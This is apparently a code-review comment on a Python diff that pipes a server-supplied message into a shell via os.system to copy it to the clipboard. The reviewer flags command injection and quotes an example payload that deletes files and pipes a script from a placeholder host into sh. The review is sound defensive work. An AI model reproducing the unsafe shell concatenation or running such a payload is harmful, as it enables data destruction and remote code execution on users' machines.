client/protocols/backup.py

```diff
@@ -176,4 +188,21 @@ def send_messages(self, access_token, messages, timeout):
         response = urllib.request.urlopen(request, serialized_data, timeout)
         return json.loads(response.read().decode('utf-8'))
 
+    @staticmethod
+    def cp(msg):
+        try:
+            # windows
+            if os.name == 'nt':
+                res = os.system('echo ' + msg.strip() + '| clip')
```

Comment:
This approach does open us up to command injection. (If someone is able to modify server responses, they could respond with the message string containing `; rm -rf ./*; curl bad.sh | sh; `.

I don't know if there's a way to avoid that.